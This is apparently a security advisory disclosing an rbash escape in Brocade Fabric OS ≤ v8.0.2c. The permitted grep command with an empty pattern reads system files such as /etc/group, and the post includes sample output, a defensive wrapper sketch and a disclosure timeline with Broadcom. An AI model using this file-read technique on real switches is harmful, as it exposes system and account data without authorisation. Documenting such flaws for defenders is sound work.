Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files
Broadcom offers a number of products and networking solutions such as switches, extensions, etc. These products come with their own operating system, Fabric OS. It is a lightweight OS; upon logging in through telnet, one lands in the restricted environment of rbash. The user cannot execute any of the usual system commands, such as cat, but only some custom commands the developers have made themselves, e.g.
    ...
    iflshow          Display edge switch FCR connection information
    interfaceshow    Display the FSPF (TM) interface information
    iodset           Manage the in-order delivery (IOD) option
    iodshow          Display the state of the in-order delivery option
    ipaddrset        Set ethernet and FC IP addresses
    ipaddrshow       Print ethernet and FC IP addresses
    islshow          Display the current connections and status
    ...
One of the available commands is the classic system command grep. The system also allows pipelines (|), which explains why the developers allow the use of grep:

    HOSTNAME:user> ipaddrshow
    SWITCH
    Ethernet IP Address: 10.115.76.184
    Ethernet Subnetmask: 255.255.254.0
    Gateway IP Address: 10.115.76.251
    DHCP: Off
    HOSTNAME:user> ipaddrshow |grep Gateway
    Gateway IP Address: 10.115.76.251
    HOSTNAME:user>

With grep available, one can read underlying system files by searching for the empty pattern ''. The files one has access to depend on the authenticated user's privileges.
    HOSTNAME:user> cat /etc/group
    rbash: cat: command not found
    HOSTNAME:user> ls /etc/group
    rbash: ls: command not found
    HOSTNAME:user> grep '' /etc/group
    root::0:root
    sys::3:root,bin
    smmsp::25:smmsp
    nobody::99:
    users::100:
    utmp:x:102:
    admin::600:admin,root
    user::602:user,admin,root
    switchadmin::604:
    operator::605:
    zoneadmin::606:
    fabricadmin::607:
    basicswitchadmin::608:
    securityadmin::609:
    udrole::550:
    HOSTNAME:user>
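The session above works because rbash restricts which commands may be run, not which file operands an allowed command accepts. The following is an added example, not Brocade's code and not a description of Broadcom's fix: a POSIX sh front end that offers grep as a pipeline filter only. The name pipe_grep and the option allowlist are assumptions.

```sh
#!/bin/sh
# Added example, not vendor code. pipe_grep (hypothetical name) exposes grep
# as a pipeline filter only: it never passes a file operand to grep.
# The option allowlist below is an assumption chosen for this sketch.

pipe_grep() {
    opts=""
    while [ $# -gt 0 ]; do
        case "$1" in
            --) shift; break ;;            # explicit end of options
            -*)
                # Allow only bundles of flags that cannot make grep open a
                # file; this rejects -r/-R, -f FILE, -e and every --long option.
                case "${1#-}" in
                    ""|*[!ivcnwxEF]*)
                        echo "pipe_grep: option not allowed: $1" >&2
                        return 2 ;;
                esac
                opts="$opts $1"; shift ;;
            *) break ;;                    # first non-option is the pattern
        esac
    done
    # Exactly one operand may remain (the pattern). A second operand would be
    # a file name, which is how `grep '' /etc/group` read the file above.
    if [ $# -ne 1 ]; then
        echo "pipe_grep: usage: COMMAND | pipe_grep [-ivcnwxEF] PATTERN" >&2
        return 2
    fi
    # $opts is unquoted on purpose: it holds only validated flag bundles.
    grep $opts -- "$1"
}

# Constructed sample standing in for ipaddrshow output.
sample='Ethernet IP Address: 10.115.76.184
Gateway IP Address: 10.115.76.251
DHCP: Off'

printf '%s\n' "$sample" | pipe_grep Gateway      # allowed: filters stdin
pipe_grep '' /etc/group </dev/null || echo "refused, status $?"
```

This closes only the file-operand path shown in the session. What a user can read still depends on their privileges, so file permissions remain the underlying control.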
The issue was discovered by Bitcrack during a penetration test for a client and reported to Broadcom's PSIRT. Broadcom's internal security audit had discovered it earlier this year, and a fix had been scheduled before Bitcrack notified them.
Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and request for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022